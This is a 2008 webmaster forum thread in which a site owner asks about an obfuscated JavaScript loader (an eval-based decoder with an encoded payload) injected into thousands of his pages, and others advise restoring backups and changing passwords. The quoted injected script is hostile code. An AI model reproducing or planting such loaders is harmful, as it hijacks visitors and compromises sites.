|
2008-05-08, 02:51 PM | #1 |
Mean people suck, nice people swallow, are you mean or nice?
|
Know What This Is?
Someone told me my link to my webmasters page re-directed them to this page: http://ya.ru/ so I asked my server tech to look into it and he said he found this script but didn't know if it is legit or not. It's NOT on my hard drive copy of the page so does anyone know what this is and if you know what it is, how did it get on my page at the server? (fuckpage.com is one of my domains)
Code:
<script language=JavaScript>function cujban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,50,24,8,56,16,52,28,39,60,0 ,0,0,0,0,0,55,53,9,48,47,43,36,35,17,1,38,23,0,32,51,62,20,41,2,22,14,40,6,34,33,15,57,0,0,0,0,54,0,61,27,13,46,21,11,12,5,19,49,44,10,42,59,7,58,25, 30,29,4,31,26,3,18,37,45);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCh arCode(239^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}cujban('2v2MfR3JINZJTdQJ7lc1ER2MlWgAfR3GvlUWIdqC2_QXbm4j3YzXB_QGRm4NIpUMllaWSN2GBOg8s1U6cu4JbOqALwg @oR38b1qCVV2WLR9JLwc1tfmGbr2CsRUJId4jWp4JoV78TV4WLl4jVKk@28c_sbgj3DUAg_2W3ig1c0gJVd4Jolc@28aNomUX3r4JxDc_YNZJSTUWx@9WV1Z8wpUyeo3MIm2NHYcCVJ28TlUWHGkj ')</script><!-- fuckpage.com -->" Last edited by Licker4U; 2008-05-08 at 02:53 PM.. |
2008-05-08, 03:57 PM | #2 |
Mean people suck, nice people swallow, are you mean or nice?
|
Well damn, now someone has found that script on one of my free sites. WTF is going on?
|
2008-05-08, 04:06 PM | #3 |
Subversive filth of the hedonistic decadent West
Join Date: Mar 2003
Location: Southeast Florida
Posts: 27,936
|
I would guess that you have been hacked.
|
2008-05-08, 04:11 PM | #4 |
If you really need money, you can sell your kidney or even your car
Join Date: Apr 2007
Posts: 374
|
Yep, you've been hacked. I would contact your host and see if they can help sort it out for you.
|
2008-05-08, 04:41 PM | #5 |
Mean people suck, nice people swallow, are you mean or nice?
|
Yeah, the tech guy says I have that code embedded on multiple domains. Seems it's on every index page and main page of all my free sites and on my link lists. Tech guy said someond has my password but even I don't know what my password is. I have it saved in my FTP software and it just appears as ****'s when I upload files. They're looking into it. And here I thought I was coasting down hill to the weekend....|shocking|
|
2008-05-08, 07:09 PM | #6 |
You can now put whatever you want in this space :)
|
Whining would be appropriate now
Just kidding I feel your pain Licker
__________________
How To Keep An Asshole In Suspense
I'll Tell You Later |
2008-05-08, 09:29 PM | #7 |
ICQ:147*079*406
|
Im seeing hacks more and more lately..crazy shit. Hope ya get it sorted out Licker
__________________
The Sexy Side of Porn Last edited by NY Jester; 2008-05-08 at 09:31 PM.. |
2008-05-08, 09:39 PM | #8 |
Mean people suck, nice people swallow, are you mean or nice?
|
Server tech says that JS was added to 4000 of my pages on May 1st from an ISP in Italy. WTF? Now I have to re-boot in safe mode to let Avast do a complete system scan to make sure my machine is clean before we do anything. How do I re-boot in safe mode?
Tech also said it might be easier to restore my data from back up rather than try to clean all the infected files. I sure as hell don't want to re-upload 4000 html pages. Isn't there some kind of "find and replace" software I can run to find the JS and replace it with nothing? Last edited by Licker4U; 2008-05-08 at 09:43 PM.. |
2008-05-08, 10:08 PM | #9 |
Lonewolf Internet Sales
|
press F8 during boot up to get to the boot selection menu to choose Safe Mode
I believe there is a shell command for doing a search and replace on files on the server, but it's not for the feint hearted as there is no undo. |
2008-05-08, 10:50 PM | #10 |
It's the end of the world as we know it, and I feel fine
Join Date: Jul 2006
Location: Canada
Posts: 2,527
|
A similar script was installed on some of my sites a few months ago, I was hacked. I deleted it and changed my ftp password and it didn't come back. Problem for me was that google picked it up before I did and put a bigass warning in front my listings. Took two fucking weeks before they took the warning down, took two minutes to find and remove the code.
__________________
If the Environment was a bank, they would have saved it by now. |
2008-05-08, 11:19 PM | #11 |
Mean people suck, nice people swallow, are you mean or nice?
|
Tech guy says they have back-up files as of April 30 the day before the hack so they can restore everything. WHEW! Load off me for sure.
|
2008-05-09, 08:21 AM | #12 |
ICQ:147*079*406
|
Well, in the big scheme of things thats some good news for you Licker..hope it solves the issues.
__________________
The Sexy Side of Porn |
2008-05-09, 08:52 AM | #13 |
~Serving Up Sinful Sex ~
Join Date: Apr 2003
Location: Missouri City, Texas
Posts: 1,928
|
Wow - that's scary Licker! I'm glad you've got everything sorted out.
|
2008-05-09, 09:14 AM | #14 |
Shift Out / X-On
|
Sorry to hear that
I feel your pain. Over 4000 index pages.Sh$$#t. I had similar problem on my LL month ago.They access my admin area (not FTP) and include code on all my templates. Damn spamers,hackers,mutherfuckers-kill them all |
2008-05-09, 11:10 AM | #15 |
Mean people suck, nice people swallow, are you mean or nice?
|
I don't know how that script works but I just checked and I had NO traffic for the first eight days of the month up until last night when the tech guy restored all my old pages which didn't have the script. That explains the lack of sales this month. |shocking|
|
2008-06-03, 04:28 AM | #16 |
Aw, Dad, you've done a lot of great things, but you're a very old man, and old people are useless
Join Date: Aug 2006
Posts: 25
|
That really sucks. I once had something like that, but the host could also put back a backup, so all the pages were clean again. After that both you and the host should take some countermeasures like changing passwords and maybe updating scripts ?
Good luck on it |
2008-06-09, 06:42 PM | #17 |
Just because I don't care doesn't mean I don't understand!
Join Date: Mar 2006
Posts: 96
|
A while ago my rss feeds stoped to work and i couldn't figure out what's wrong.. guess what! On all my pages was this javascript shit
It redirected to go-piercing.com I checked the ftp and control panel access logs and found two suspicious logins.. 2008-06-09 20:20:39 85.17.138.39 Netherlands yes 2008-06-08 20:46:25 83.149.110.231 Netherlands yes Looks like some script kiddies have new toys
__________________
submit your free sites to Hardcore Porn Links |
|
|